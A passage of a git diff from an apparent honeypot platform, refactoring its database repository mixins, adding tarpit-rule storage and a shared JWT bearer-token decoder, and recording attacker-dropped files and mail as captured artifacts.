kind is not None: stmt = stmt.where(CanaryToken.kind == kind) + if topology_id is not None: + stmt = stmt.where(CanaryToken.topology_id == topology_id) stmt = stmt.order_by(desc(CanaryToken.placed_at)) result = await session.execute(stmt) return [r.model_dump(mode="json") for r in result.scalars().all()] diff --git a/decnet/web/db/sqlmodel_repo/credentials/_core.py b/decnet/web/db/sqlmodel_repo/credentials/_core.py index 86649e05..c2f0d61c 100644 --- a/decnet/web/db/sqlmodel_repo/credentials/_core.py +++ b/decnet/web/db/sqlmodel_repo/credentials/_core.py @@ -6,12 +6,15 @@ from 
datetime import datetime, timezone from typing import Any, List, Optional from sqlalchemy import desc, func, or_, select, update +from sqlmodel import col from sqlmodel.sql.expression import SelectOfScalar from decnet.web.db.models import Credential -class CredentialsCoreMixin: +from decnet.web.db.sqlmodel_repo._helpers import _MixinBase + +class CredentialsCoreMixin(_MixinBase): async def upsert_credential(self, data: dict[str, Any]) -> int: """Upsert a credential attempt; returns the row id. @@ -37,7 +40,7 @@ class CredentialsCoreMixin: Credential.secret_sha256 == payload["secret_sha256"], # NULL == NULL is False under SQL — branch the predicate. (Credential.principal == principal) if principal is not None - else Credential.principal.is_(None), + else col(Credential.principal).is_(None), ) existing = (await session.execute(stmt)).scalar_one_or_none() now = datetime.now(timezone.utc) @@ -48,7 +51,7 @@ class CredentialsCoreMixin: existing.outcome = payload["outcome"] session.add(existing) await session.commit() - return existing.id # type: ignore[return-value] + return existing.id row = Credential( attacker_ip=payload["attacker_ip"], decky_name=payload["decky_name"], @@ -84,10 +87,10 @@ class CredentialsCoreMixin: lk = f"%{search}%" statement = statement.where( or_( - Credential.decky_name.like(lk), - Credential.service.like(lk), - Credential.principal.like(lk), - Credential.secret_printable.like(lk), + col(Credential.decky_name).like(lk), + col(Credential.service).like(lk), + col(Credential.principal).like(lk), + col(Credential.secret_printable).like(lk), ) ) return statement @@ -188,7 +191,7 @@ class CredentialsCoreMixin: update(Credential) .where( Credential.attacker_ip == attacker_ip, - Credential.attacker_uuid.is_(None), + col(Credential.attacker_uuid).is_(None), ) .values(attacker_uuid=attacker_uuid) ) diff --git a/decnet/web/db/sqlmodel_repo/credentials/reuse.py b/decnet/web/db/sqlmodel_repo/credentials/reuse.py index 8421a62f..74e6251e 100644 --- 
a/decnet/web/db/sqlmodel_repo/credentials/reuse.py +++ b/decnet/web/db/sqlmodel_repo/credentials/reuse.py @@ -9,11 +9,14 @@ from datetime import datetime, timezone from typing import Any, List, Optional from sqlalchemy import desc, func, select +from sqlmodel import col from decnet.web.db.models import Credential, CredentialReuse -class CredentialReuseMixin: +from decnet.web.db.sqlmodel_repo._helpers import _MixinBase + +class CredentialReuseMixin(_MixinBase): @staticmethod def _merge_unique(existing_json: str, value: Optional[str]) -> tuple[str, bool]: """Append ``value`` to a JSON list[str] column if not present. @@ -117,7 +120,7 @@ class CredentialReuseMixin: Credential.secret_sha256 == secret_sha256, Credential.secret_kind == secret_kind, (Credential.principal == principal) if principal is not None - else Credential.principal.is_(None), + else col(Credential.principal).is_(None), ) ) target_count = (await session.execute(stmt)).scalar() or 0 @@ -150,7 +153,7 @@ class CredentialReuseMixin: ).label("target_count") async with self._session() as session: group_stmt = ( - select( + select( # type: ignore[call-overload] Credential.secret_sha256, Credential.secret_kind, Credential.principal, @@ -171,7 +174,7 @@ class CredentialReuseMixin: Credential.secret_kind == kind, (Credential.principal == principal) if principal is not None - else Credential.principal.is_(None), + else col(Credential.principal).is_(None), ) rows = (await session.execute(cred_stmt)).scalars().all() out.append({ @@ -253,13 +256,13 @@ class CredentialReuseMixin: sha_set = {r["secret_sha256"] for r in rows} if not sha_set: return - stmt = select( + stmt = select( # type: ignore[call-overload] Credential.secret_sha256, Credential.secret_kind, Credential.principal, Credential.secret_printable, Credential.secret_b64, - ).where(Credential.secret_sha256.in_(sha_set)) + ).where(col(Credential.secret_sha256).in_(sha_set)) secret_map: dict[ tuple[str, str, Optional[str]], tuple[Optional[str], 
Optional[str]], diff --git a/decnet/web/db/sqlmodel_repo/deckies.py b/decnet/web/db/sqlmodel_repo/deckies.py index 39b98f3f..7a66596f 100644 --- a/decnet/web/db/sqlmodel_repo/deckies.py +++ b/decnet/web/db/sqlmodel_repo/deckies.py @@ -11,7 +11,9 @@ from sqlalchemy import asc, select, text from decnet.web.db.models import DeckyShard -class DeckiesMixin: +from decnet.web.db.sqlmodel_repo._helpers import _MixinBase + +class DeckiesMixin(_MixinBase): """Mixin: composed onto ``SQLModelRepository``.""" async def upsert_decky_shard(self, data: dict[str, Any]) -> None: diff --git a/decnet/web/db/sqlmodel_repo/fleet.py b/decnet/web/db/sqlmodel_repo/fleet.py index 60eef39f..5ed25ca2 100644 --- a/decnet/web/db/sqlmodel_repo/fleet.py +++ b/decnet/web/db/sqlmodel_repo/fleet.py @@ -8,10 +8,13 @@ import orjson from sqlalchemy import asc, select, text, update from decnet.web.db.models import DeckyShard, FleetDecky, LOCAL_HOST_SENTINEL -from decnet.web.db.sqlmodel_repo._helpers import _deserialize_json_fields +from decnet.web.db.sqlmodel_repo._helpers import ( + _MixinBase, + _deserialize_json_fields +) -class FleetMixin: +class FleetMixin(_MixinBase): """Mixin: composed onto ``SQLModelRepository``. 
``list_running_deckies`` aggregates topology + fleet + swarm-shard @@ -59,6 +62,16 @@ class FleetMixin: ) await session.commit() + async def get_fleet_decky_by_name(self, name: str) -> dict[str, Any] | None: + async with self._session() as session: + result = await session.execute( + select(FleetDecky).where(FleetDecky.name == name) + ) + row = result.scalar_one_or_none() + if row is None: + return None + return _deserialize_json_fields(row.model_dump(mode="json"), ("services", "decky_config")) + async def list_fleet_deckies( self, *, host_uuid: Optional[str] = None, ) -> list[dict[str, Any]]: diff --git a/decnet/web/db/sqlmodel_repo/identities.py b/decnet/web/db/sqlmodel_repo/identities.py index afb0b45d..a36bae11 100644 --- a/decnet/web/db/sqlmodel_repo/identities.py +++ b/decnet/web/db/sqlmodel_repo/identities.py @@ -11,11 +11,14 @@ from datetime import datetime, timezone from typing import Any, Optional from sqlalchemy import desc, func, select, update +from sqlmodel import col from decnet.web.db.models import Attacker, AttackerIdentity -class IdentitiesMixin: +from decnet.web.db.sqlmodel_repo._helpers import _MixinBase + +class IdentitiesMixin(_MixinBase): """Mixin: composed onto ``SQLModelRepository``. ``self._deserialize_attacker`` resolves through ``AttackersMixin`` @@ -51,7 +54,7 @@ class IdentitiesMixin: # and a future "merged into" endpoint when we need it. 
statement = ( select(AttackerIdentity) - .where(AttackerIdentity.merged_into_uuid.is_(None)) + .where(col(AttackerIdentity.merged_into_uuid).is_(None)) .order_by(desc(AttackerIdentity.updated_at)) .offset(offset) .limit(limit) @@ -64,7 +67,7 @@ class IdentitiesMixin: statement = ( select(func.count()) .select_from(AttackerIdentity) - .where(AttackerIdentity.merged_into_uuid.is_(None)) + .where(col(AttackerIdentity.merged_into_uuid).is_(None)) ) async with self._session() as session: result = await session.execute(statement) @@ -105,7 +108,7 @@ class IdentitiesMixin: # joined from logs, c2 endpoints aggregated from sessions) can # land here without churning every caller. ``fingerprints`` is # the raw JSON list — the clusterer parses for JA3 / HASSH. - statement = select( + statement = select( # type: ignore[call-overload] Attacker.uuid, Attacker.asn, Attacker.identity_id, Attacker.fingerprints, ).order_by(Attacker.first_seen) if limit is not None: diff --git a/decnet/web/db/sqlmodel_repo/logs.py b/decnet/web/db/sqlmodel_repo/logs.py index 4d1ae1a4..041d5694 100644 --- a/decnet/web/db/sqlmodel_repo/logs.py +++ b/decnet/web/db/sqlmodel_repo/logs.py @@ -15,13 +15,16 @@ from typing import Any, List, Optional import orjson from sqlalchemy import asc, desc, func, or_, select, text +from sqlmodel import col from sqlmodel.sql.expression import SelectOfScalar from decnet.config import load_state from decnet.web.db.models import Log, TopologyDecky -class LogsMixin: +from decnet.web.db.sqlmodel_repo._helpers import _MixinBase + +class LogsMixin(_MixinBase): """Mixin: composed onto ``SQLModelRepository``.""" @staticmethod @@ -61,9 +64,9 @@ class LogsMixin: end_time: Optional[str], ) -> SelectOfScalar: if start_time: - statement = statement.where(Log.timestamp >= start_time) + statement = statement.where(col(Log.timestamp) >= start_time) if end_time: - statement = statement.where(Log.timestamp <= end_time) + statement = statement.where(col(Log.timestamp) <= end_time) if search: 
try: @@ -95,10 +98,10 @@ class LogsMixin: lk = f"%{token}%" statement = statement.where( or_( - Log.raw_line.like(lk), - Log.decky.like(lk), - Log.service.like(lk), - Log.attacker_ip.like(lk), + col(Log.raw_line).like(lk), + col(Log.decky).like(lk), + col(Log.service).like(lk), + col(Log.attacker_ip).like(lk), ) ) return statement @@ -148,7 +151,7 @@ class LogsMixin: end_time: Optional[str] = None, ) -> List[dict]: statement = ( - select(Log).where(Log.id > last_id).order_by(asc(Log.id)).limit(limit) + select(Log).where(col(Log.id) > last_id).order_by(asc(Log.id)).limit(limit) ) statement = self._apply_filters(statement, search, start_time, end_time) diff --git a/decnet/web/db/sqlmodel_repo/orchestrator.py b/decnet/web/db/sqlmodel_repo/orchestrator.py index b84191a3..6fceb507 100644 --- a/decnet/web/db/sqlmodel_repo/orchestrator.py +++ b/decnet/web/db/sqlmodel_repo/orchestrator.py @@ -7,11 +7,14 @@ from typing import Any, Optional from sqlalchemy import delete as sa_delete from sqlalchemy import desc, func, or_, select +from sqlmodel import col from decnet.web.db.models import OrchestratorEmail, OrchestratorEvent -class OrchestratorMixin: +from decnet.web.db.sqlmodel_repo._helpers import _MixinBase + +class OrchestratorMixin(_MixinBase): """Mixin: composed onto ``SQLModelRepository``.""" async def record_orchestrator_event(self, data: dict[str, Any]) -> str: @@ -62,11 +65,11 @@ class OrchestratorMixin: deleted = 0 async with self._session() as session: dst_rows = await session.execute( - select(OrchestratorEvent.dst_decky_uuid).distinct() + select(col(OrchestratorEvent.dst_decky_uuid)).distinct() ) for (dst,) in dst_rows.all(): keep = await session.execute( - select(OrchestratorEvent.uuid) + select(col(OrchestratorEvent.uuid)) .where(OrchestratorEvent.dst_decky_uuid == dst) .order_by(desc(OrchestratorEvent.ts)) .limit(per_dst_cap) @@ -76,7 +79,7 @@ class OrchestratorMixin: continue stmt = sa_delete(OrchestratorEvent).where( OrchestratorEvent.dst_decky_uuid == dst, 
- OrchestratorEvent.uuid.notin_(keep_uuids), + col(OrchestratorEvent.uuid).notin_(keep_uuids), ) res = await session.execute(stmt) deleted += res.rowcount or 0 @@ -156,7 +159,7 @@ class OrchestratorMixin: (OrchestratorEmail.sender_email == recipient_email) & (OrchestratorEmail.recipient_email == sender_email), ), - OrchestratorEmail.success.is_(True), + col(OrchestratorEmail.success).is_(True), ) .order_by(desc(OrchestratorEmail.ts)) .limit(limit) @@ -169,11 +172,11 @@ class OrchestratorMixin: deleted = 0 async with self._session() as session: decky_rows = await session.execute( - select(OrchestratorEmail.mail_decky_uuid).distinct() + select(col(OrchestratorEmail.mail_decky_uuid)).distinct() ) for (mail_uuid,) in decky_rows.all(): keep = await session.execute( - select(OrchestratorEmail.uuid) + select(col(OrchestratorEmail.uuid)) .where(OrchestratorEmail.mail_decky_uuid == mail_uuid) .order_by(desc(OrchestratorEmail.ts)) .limit(per_decky_cap) @@ -183,7 +186,7 @@ class OrchestratorMixin: continue stmt = sa_delete(OrchestratorEmail).where( OrchestratorEmail.mail_decky_uuid == mail_uuid, - OrchestratorEmail.uuid.notin_(keep_uuids), + col(OrchestratorEmail.uuid).notin_(keep_uuids), ) res = await session.execute(stmt) deleted += res.rowcount or 0 diff --git a/decnet/web/db/sqlmodel_repo/realism.py b/decnet/web/db/sqlmodel_repo/realism.py index ee3f0002..eaa7dca8 100644 --- a/decnet/web/db/sqlmodel_repo/realism.py +++ b/decnet/web/db/sqlmodel_repo/realism.py @@ -10,7 +10,9 @@ from decnet.web.db.models import RealismConfig, SyntheticFile from decnet.web.db.models.realism import SYNTHETIC_FILE_BODY_LIMIT -class RealismMixin: +from decnet.web.db.sqlmodel_repo._helpers import _MixinBase + +class RealismMixin(_MixinBase): """Mixin: composed onto ``SQLModelRepository``.""" async def record_synthetic_file(self, data: dict[str, Any]) -> str: diff --git a/decnet/web/db/sqlmodel_repo/swarm.py b/decnet/web/db/sqlmodel_repo/swarm.py index 9fea2d9d..3e0de44c 100644 --- 
a/decnet/web/db/sqlmodel_repo/swarm.py +++ b/decnet/web/db/sqlmodel_repo/swarm.py @@ -8,7 +8,9 @@ from sqlalchemy import asc, select, text, update from decnet.web.db.models import SwarmHost -class SwarmMixin: +from decnet.web.db.sqlmodel_repo._helpers import _MixinBase + +class SwarmMixin(_MixinBase): """Mixin: composed onto ``SQLModelRepository``. Expects ``self._session()``.""" async def add_swarm_host(self, data: dict[str, Any]) -> None: diff --git a/decnet/web/db/sqlmodel_repo/tarpit.py b/decnet/web/db/sqlmodel_repo/tarpit.py new file mode 100644 index 00000000..e2eb5df5 --- /dev/null +++ b/decnet/web/db/sqlmodel_repo/tarpit.py @@ -0,0 +1,72 @@ +"""Tarpit rule CRUD.""" +from __future__ import annotations + +import json +import uuid +from datetime import datetime, timezone +from typing import Any, Optional + +from sqlalchemy import select + +from decnet.web.db.models import TarpitRule + + +from decnet.web.db.sqlmodel_repo._helpers import _MixinBase + +class TarpitMixin(_MixinBase): + """Mixin: composed onto ``SQLModelRepository``.""" + + async def set_tarpit_rule(self, data: dict[str, Any]) -> None: + """Upsert a tarpit rule keyed on ``decky_name`` (one rule per decky).""" + async with self._session() as session: + result = await session.execute( + select(TarpitRule).where(TarpitRule.decky_name == data["decky_name"]) + ) + existing = result.scalar_one_or_none() + if existing: + for k, v in data.items(): + setattr(existing, k, v) + session.add(existing) + else: + payload = { + "id": str(uuid.uuid4()), + "created_at": datetime.now(timezone.utc), + **data, + } + session.add(TarpitRule(**payload)) + await session.commit() + + async def get_tarpit_rule(self, decky_name: str) -> Optional[dict[str, Any]]: + async with self._session() as session: + result = await session.execute( + select(TarpitRule).where(TarpitRule.decky_name == decky_name) + ) + row = result.scalar_one_or_none() + if row is None: + return None + d = row.model_dump(mode="json") + d["ports"] = 
json.loads(d["ports"]) + return d + + async def delete_tarpit_rule(self, decky_name: str) -> bool: + async with self._session() as session: + result = await session.execute( + select(TarpitRule).where(TarpitRule.decky_name == decky_name) + ) + row = result.scalar_one_or_none() + if row is None: + return False + await session.delete(row) + await session.commit() + return True + + async def list_tarpit_rules(self) -> list[dict[str, Any]]: + async with self._session() as session: + result = await session.execute(select(TarpitRule)) + rows = result.scalars().all() + out = [] + for row in rows: + d = row.model_dump(mode="json") + d["ports"] = json.loads(d["ports"]) + out.append(d) + return out diff --git a/decnet/web/db/sqlmodel_repo/topology/_core.py b/decnet/web/db/sqlmodel_repo/topology/_core.py index a70f4c7c..8fbf9681 100644 --- a/decnet/web/db/sqlmodel_repo/topology/_core.py +++ b/decnet/web/db/sqlmodel_repo/topology/_core.py @@ -8,13 +8,16 @@ from typing import Any, Optional from sqlalchemy import desc, func, select, text from decnet.web.db.models import Topology, TopologyStatusEvent +from decnet.web.db.models.topology import TopologySummary +from sqlmodel import col + from decnet.web.db.sqlmodel_repo._helpers import ( - _deserialize_json_fields, - _serialize_json_fields, + _MixinBase, + _serialize_json_fields ) -class TopologyCoreMixin: +class TopologyCoreMixin(_MixinBase): """Topologies CRUD + ``_assert_pending`` / ``_check_and_bump_version``. 
The two private helpers live here because every other topology @@ -32,7 +35,7 @@ class TopologyCoreMixin: await session.refresh(row) return row.id - async def get_topology(self, topology_id: str) -> Optional[dict[str, Any]]: + async def get_topology(self, topology_id: str) -> Optional[TopologySummary]: async with self._session() as session: result = await session.execute( select(Topology).where(Topology.id == topology_id) @@ -40,15 +43,14 @@ class TopologyCoreMixin: row = result.scalar_one_or_none() if not row: return None - d = row.model_dump(mode="json") - return _deserialize_json_fields(d, ("config_snapshot",)) + return TopologySummary.model_validate(row.model_dump(mode="json")) async def list_topologies( self, status: Optional[str] = None, limit: Optional[int] = None, offset: Optional[int] = None, - ) -> list[dict[str, Any]]: + ) -> list[TopologySummary]: statement = select(Topology).order_by(desc(Topology.created_at)) if status: statement = statement.where(Topology.status == status) @@ -59,9 +61,7 @@ class TopologyCoreMixin: async with self._session() as session: result = await session.execute(statement) return [ - _deserialize_json_fields( - r.model_dump(mode="json"), ("config_snapshot",) - ) + TopologySummary.model_validate(r.model_dump(mode="json")) for r in result.scalars().all() ] @@ -140,15 +140,13 @@ class TopologyCoreMixin: await session.commit() return True - async def list_topologies_needing_resync(self) -> list[dict[str, Any]]: + async def list_topologies_needing_resync(self) -> list[TopologySummary]: async with self._session() as session: result = await session.execute( select(Topology).where(Topology.needs_resync == True) # noqa: E712 ) return [ - _deserialize_json_fields( - r.model_dump(mode="json"), ("config_snapshot",) - ) + TopologySummary.model_validate(r.model_dump(mode="json")) for r in result.scalars().all() ] @@ -191,8 +189,8 @@ class TopologyCoreMixin: """Return ids of topologies currently in ``active|degraded``.""" async with 
self._session() as session: result = await session.execute( - select(Topology.id).where( - Topology.status.in_(["active", "degraded"]) + select(col(Topology.id)).where( + col(Topology.status).in_(["active", "degraded"]) ) ) return [r for r in result.scalars().all()] diff --git a/decnet/web/db/sqlmodel_repo/topology/deckies.py b/decnet/web/db/sqlmodel_repo/topology/deckies.py index 23fac911..75b5f29a 100644 --- a/decnet/web/db/sqlmodel_repo/topology/deckies.py +++ b/decnet/web/db/sqlmodel_repo/topology/deckies.py @@ -8,13 +8,15 @@ from typing import Any, Optional from sqlalchemy import asc, select, text, update from decnet.web.db.models import TopologyDecky +from decnet.web.db.models.topology import DeckyRow from decnet.web.db.sqlmodel_repo._helpers import ( + _MixinBase, _deserialize_json_fields, _serialize_json_fields, ) -class TopologyDeckiesMixin: +class TopologyDeckiesMixin(_MixinBase): """``self._assert_pending`` / ``self._check_and_bump_version`` resolve through ``TopologyCoreMixin`` via MRO.""" @@ -72,8 +74,19 @@ class TopologyDeckiesMixin: decky_uuid: str, *, expected_version: Optional[int] = None, + enforce_pending: bool = True, ) -> None: - """Cascade-delete a decky + all its edges from a pending topology.""" + """Cascade-delete a decky + all its edges from a topology. + + Defaults to ``enforce_pending=True`` so HTTP CRUD callers + (api_decky_crud.py) get the existing 409 guard for free. The + mutator's ``apply_remove_decky`` is the only path that's + legitimately allowed to delete from an active topology — it + passes ``enforce_pending=False`` after dequeuing the mutation + through its own active-topology gating (the queue is the live + editing surface; the repo's CRUD guard is for the design-time + endpoints that mustn't bypass it). 
+ """ async with self._session() as session: result = await session.execute( select(TopologyDecky).where(TopologyDecky.uuid == decky_uuid) @@ -81,7 +94,8 @@ class TopologyDeckiesMixin: d = result.scalar_one_or_none() if d is None: return - await self._assert_pending(session, d.topology_id) + if enforce_pending: + await self._assert_pending(session, d.topology_id) if expected_version is not None: await self._check_and_bump_version( session, d.topology_id, expected_version @@ -98,7 +112,7 @@ class TopologyDeckiesMixin: async def list_topology_deckies( self, topology_id: str - ) -> list[dict[str, Any]]: + ) -> list[DeckyRow]: async with self._session() as session: result = await session.execute( select(TopologyDecky) @@ -106,8 +120,10 @@ class TopologyDeckiesMixin: .order_by(asc(TopologyDecky.name)) ) return [ - _deserialize_json_fields( - r.model_dump(mode="json"), ("services", "decky_config") + DeckyRow.model_validate( + _deserialize_json_fields( + r.model_dump(mode="json"), ("services", "decky_config") + ) ) for r in result.scalars().all() ] diff --git a/decnet/web/db/sqlmodel_repo/topology/edges.py b/decnet/web/db/sqlmodel_repo/topology/edges.py index 6ce0330b..e82dcde1 100644 --- a/decnet/web/db/sqlmodel_repo/topology/edges.py +++ b/decnet/web/db/sqlmodel_repo/topology/edges.py @@ -6,9 +6,12 @@ from typing import Any, Optional from sqlalchemy import desc, select, text from decnet.web.db.models import TopologyEdge, TopologyStatusEvent +from decnet.web.db.models.topology import EdgeRow -class TopologyEdgesMixin: +from decnet.web.db.sqlmodel_repo._helpers import _MixinBase + +class TopologyEdgesMixin(_MixinBase): """``self._assert_pending`` / ``self._check_and_bump_version`` resolve through ``TopologyCoreMixin`` via MRO.""" @@ -33,7 +36,12 @@ class TopologyEdgesMixin: edge_id: str, *, expected_version: Optional[int] = None, + enforce_pending: bool = True, ) -> None: + """Delete one edge. 
``enforce_pending=True`` by default — the + mutator's ``apply_detach_decky`` opts out, same rationale as + ``delete_topology_decky``. + """ async with self._session() as session: result = await session.execute( select(TopologyEdge).where(TopologyEdge.id == edge_id) @@ -41,7 +49,8 @@ class TopologyEdgesMixin: edge = result.scalar_one_or_none() if edge is None: return - await self._assert_pending(session, edge.topology_id) + if enforce_pending: + await self._assert_pending(session, edge.topology_id) if expected_version is not None: await self._check_and_bump_version( session, edge.topology_id, expected_version @@ -54,12 +63,12 @@ class TopologyEdgesMixin: async def list_topology_edges( self, topology_id: str - ) -> list[dict[str, Any]]: + ) -> list[EdgeRow]: async with self._session() as session: result = await session.execute( select(TopologyEdge).where(TopologyEdge.topology_id == topology_id) ) - return [r.model_dump(mode="json") for r in result.scalars().all()] + return [EdgeRow.model_validate(r.model_dump(mode="json")) for r in result.scalars().all()] async def list_topology_status_events( self, topology_id: str, limit: int = 100 diff --git a/decnet/web/db/sqlmodel_repo/topology/lans.py b/decnet/web/db/sqlmodel_repo/topology/lans.py index fe38c1f8..cfdfc369 100644 --- a/decnet/web/db/sqlmodel_repo/topology/lans.py +++ b/decnet/web/db/sqlmodel_repo/topology/lans.py @@ -6,9 +6,12 @@ from typing import Any, Optional from sqlalchemy import asc, select, text, update from decnet.web.db.models import LAN, TopologyEdge +from decnet.web.db.models.topology import LANRow -class LansMixin: +from decnet.web.db.sqlmodel_repo._helpers import _MixinBase + +class LansMixin(_MixinBase): """``self._assert_pending`` / ``self._check_and_bump_version`` resolve through ``TopologyCoreMixin`` via MRO.""" @@ -61,12 +64,18 @@ class LansMixin: lan_id: str, *, expected_version: Optional[int] = None, + enforce_pending: bool = True, ) -> None: - """Cascade-delete a LAN from a pending topology. 
+ """Cascade-delete a LAN. Rejects if any decky declares this LAN as its home (i.e. has a non-bridge edge to it — the only LAN that decky lives in). The caller must delete or reassign the home-deckies first. + + ``enforce_pending=True`` by default keeps the HTTP CRUD guard + intact; the mutator's ``apply_remove_lan`` opts out (it has + already gated on topology status and the live-LAN docker + materialisation runs after). """ from decnet.topology.status import TopologyNotEditable # noqa: F401 @@ -75,7 +84,8 @@ class LansMixin: lan = result.scalar_one_or_none() if lan is None: return - await self._assert_pending(session, lan.topology_id) + if enforce_pending: + await self._assert_pending(session, lan.topology_id) # Home-decky check: any decky whose only edge lands here? edges_result = await session.execute( @@ -110,9 +120,9 @@ class LansMixin: async def list_lans_for_topology( self, topology_id: str - ) -> list[dict[str, Any]]: + ) -> list[LANRow]: async with self._session() as session: result = await session.execute( select(LAN).where(LAN.topology_id == topology_id).order_by(asc(LAN.name)) ) - return [r.model_dump(mode="json") for r in result.scalars().all()] + return [LANRow.model_validate(r.model_dump(mode="json")) for r in result.scalars().all()] diff --git a/decnet/web/db/sqlmodel_repo/topology/mutations.py b/decnet/web/db/sqlmodel_repo/topology/mutations.py index 0da55575..136ffbb1 100644 --- a/decnet/web/db/sqlmodel_repo/topology/mutations.py +++ b/decnet/web/db/sqlmodel_repo/topology/mutations.py @@ -10,7 +10,9 @@ from sqlalchemy import asc, desc, select, text from decnet.web.db.models import TopologyMutation -class TopologyMutationsMixin: +from decnet.web.db.sqlmodel_repo._helpers import _MixinBase + +class TopologyMutationsMixin(_MixinBase): """``self._check_and_bump_version`` resolves through ``TopologyCoreMixin`` via MRO.""" diff --git a/decnet/web/db/sqlmodel_repo/webhooks.py b/decnet/web/db/sqlmodel_repo/webhooks.py index d6650c6d..ca37cb11 100644 --- 
a/decnet/web/db/sqlmodel_repo/webhooks.py +++ b/decnet/web/db/sqlmodel_repo/webhooks.py @@ -5,11 +5,14 @@ from datetime import datetime, timezone from typing import Any, Optional from sqlalchemy import select, update +from sqlmodel import col from decnet.web.db.models import WebhookSubscription -class WebhooksMixin: +from decnet.web.db.sqlmodel_repo._helpers import _MixinBase + +class WebhooksMixin(_MixinBase): """Mixin: composed onto ``SQLModelRepository``.""" async def create_webhook_subscription(self, data: dict[str, Any]) -> None: @@ -43,7 +46,7 @@ class WebhooksMixin: async with self._session() as session: stmt = select(WebhookSubscription) if enabled_only: - stmt = stmt.where(WebhookSubscription.enabled.is_(True)) + stmt = stmt.where(col(WebhookSubscription.enabled).is_(True)) stmt = stmt.order_by(WebhookSubscription.created_at) result = await session.execute(stmt) return [r.model_dump() for r in result.scalars().all()] @@ -100,7 +103,7 @@ class WebhooksMixin: # the counter informs the circuit-breaker heuristic, not a # correctness invariant. 
result = await session.execute( - select(WebhookSubscription.consecutive_failures).where( + select(col(WebhookSubscription.consecutive_failures)).where( WebhookSubscription.uuid == uuid ) ) diff --git a/decnet/web/dependencies.py b/decnet/web/dependencies.py index d3f83d29..abb25167 100644 --- a/decnet/web/dependencies.py +++ b/decnet/web/dependencies.py @@ -107,60 +107,48 @@ async def _get_user_cached(user_uuid: str) -> Optional[dict[str, Any]]: return user +_CREDENTIALS_EXCEPTION = HTTPException( + status_code=status.HTTP_401_UNAUTHORIZED, + detail="Could not validate credentials", + headers={"WWW-Authenticate": "Bearer"}, +) + + +def _jwt_to_uuid(token: str) -> str: + """Decode a raw JWT string and return the user UUID, or raise 401.""" + try: + payload: dict[str, Any] = jwt.decode(token, SECRET_KEY, algorithms=[ALGORITHM]) + user_uuid: Optional[str] = payload.get("uuid") + if user_uuid is None: + raise _CREDENTIALS_EXCEPTION + return user_uuid + except jwt.PyJWTError: + raise _CREDENTIALS_EXCEPTION + + +def _bearer_from_header(request: Request) -> Optional[str]: + auth = request.headers.get("Authorization") + if auth and auth.startswith("Bearer "): + return auth.split(" ", 1)[1] + return None + + async def get_stream_user(request: Request, token: Optional[str] = None) -> str: """Auth dependency for SSE endpoints — accepts Bearer header OR ?token= query param. EventSource does not support custom headers, so the query-string fallback is intentional here only. 
""" - _credentials_exception = HTTPException( - status_code=status.HTTP_401_UNAUTHORIZED, - detail="Could not validate credentials", - headers={"WWW-Authenticate": "Bearer"}, - ) - - auth_header = request.headers.get("Authorization") - resolved: str | None = ( - auth_header.split(" ", 1)[1] - if auth_header and auth_header.startswith("Bearer ") - else token - ) + resolved = _bearer_from_header(request) or token if not resolved: - raise _credentials_exception - - try: - _payload: dict[str, Any] = jwt.decode(resolved, SECRET_KEY, algorithms=[ALGORITHM]) - _user_uuid: Optional[str] = _payload.get("uuid") - if _user_uuid is None: - raise _credentials_exception - return _user_uuid - except jwt.PyJWTError: - raise _credentials_exception + raise _CREDENTIALS_EXCEPTION + return _jwt_to_uuid(resolved) async def _decode_token(request: Request) -> str: """Decode and validate a Bearer JWT, returning the user UUID.""" - _credentials_exception = HTTPException( - status_code=status.HTTP_401_UNAUTHORIZED, - detail="Could not validate credentials", - headers={"WWW-Authenticate": "Bearer"}, - ) - - auth_header = request.headers.get("Authorization") - token: str | None = ( - auth_header.split(" ", 1)[1] - if auth_header and auth_header.startswith("Bearer ") - else None - ) + token = _bearer_from_header(request) if not token: - raise _credentials_exception - - try: - _payload: dict[str, Any] = jwt.decode(token, SECRET_KEY, algorithms=[ALGORITHM]) - _user_uuid: Optional[str] = _payload.get("uuid") - if _user_uuid is None: - raise _credentials_exception - return _user_uuid - except jwt.PyJWTError: - raise _credentials_exception + raise _CREDENTIALS_EXCEPTION + return _jwt_to_uuid(token) async def get_current_user(request: Request) -> str: diff --git a/decnet/web/ingester.py b/decnet/web/ingester.py index 0ddbdfa5..bbf62482 100644 --- a/decnet/web/ingester.py +++ b/decnet/web/ingester.py @@ -568,6 +568,78 @@ async def _extract_bounty( }, }) + # 12. Captured file drops + stored mail. 
The `file_captured` event + # comes from inotifywait quarantines on SSH deckies; `message_stored` + # comes from the SMTP template's DATA-commit handler. Both are + # already what AttackerDetail's artifacts/mail tabs read; mirroring + # them into the Bounty table makes the global Vault page show them + # alongside credentials and fingerprints. Dedup on (bounty_type, + # attacker_ip, payload); sha256 in the payload guarantees per-drop + # uniqueness so repeat captures don't multiply rows. + _evt = log_data.get("event_type") + if _evt == "file_captured" and _fields.get("stored_as"): + await repo.add_bounty({ + "decky": log_data.get("decky"), + "service": log_data.get("service"), + "attacker_ip": log_data.get("attacker_ip"), + "bounty_type": "artifact", + "payload": { + "kind": "file", + "stored_as": _fields.get("stored_as"), + "sha256": _fields.get("sha256"), + "size": _fields.get("size"), + "orig_path": _fields.get("orig_path"), + "attribution": _fields.get("attribution"), + "writer_comm": _fields.get("writer_comm"), + }, + }) + elif _evt == "message_stored" and _fields.get("stored_as"): + await repo.add_bounty({ + "decky": log_data.get("decky"), + "service": log_data.get("service"), + "attacker_ip": log_data.get("attacker_ip"), + "bounty_type": "artifact", + "payload": { + "kind": "mail", + "stored_as": _fields.get("stored_as"), + "sha256": _fields.get("sha256"), + "size": _fields.get("size"), + "subject": _fields.get("subject"), + "from_hdr": _fields.get("from_hdr"), + "to_hdr": _fields.get("to_hdr"), + "mail_from": _fields.get("mail_from"), + "rcpt_to": _fields.get("rcpt_to"), + "attachment_count": _fields.get("attachment_count"), + "content_type": _fields.get("content_type"), + }, + }) + # Signal the realism worker to forward this as a probe if it's the + # first message from this IP on an smtp_relay decky. The worker has + # real internet access (the container is on MACVLAN and doesn't). 
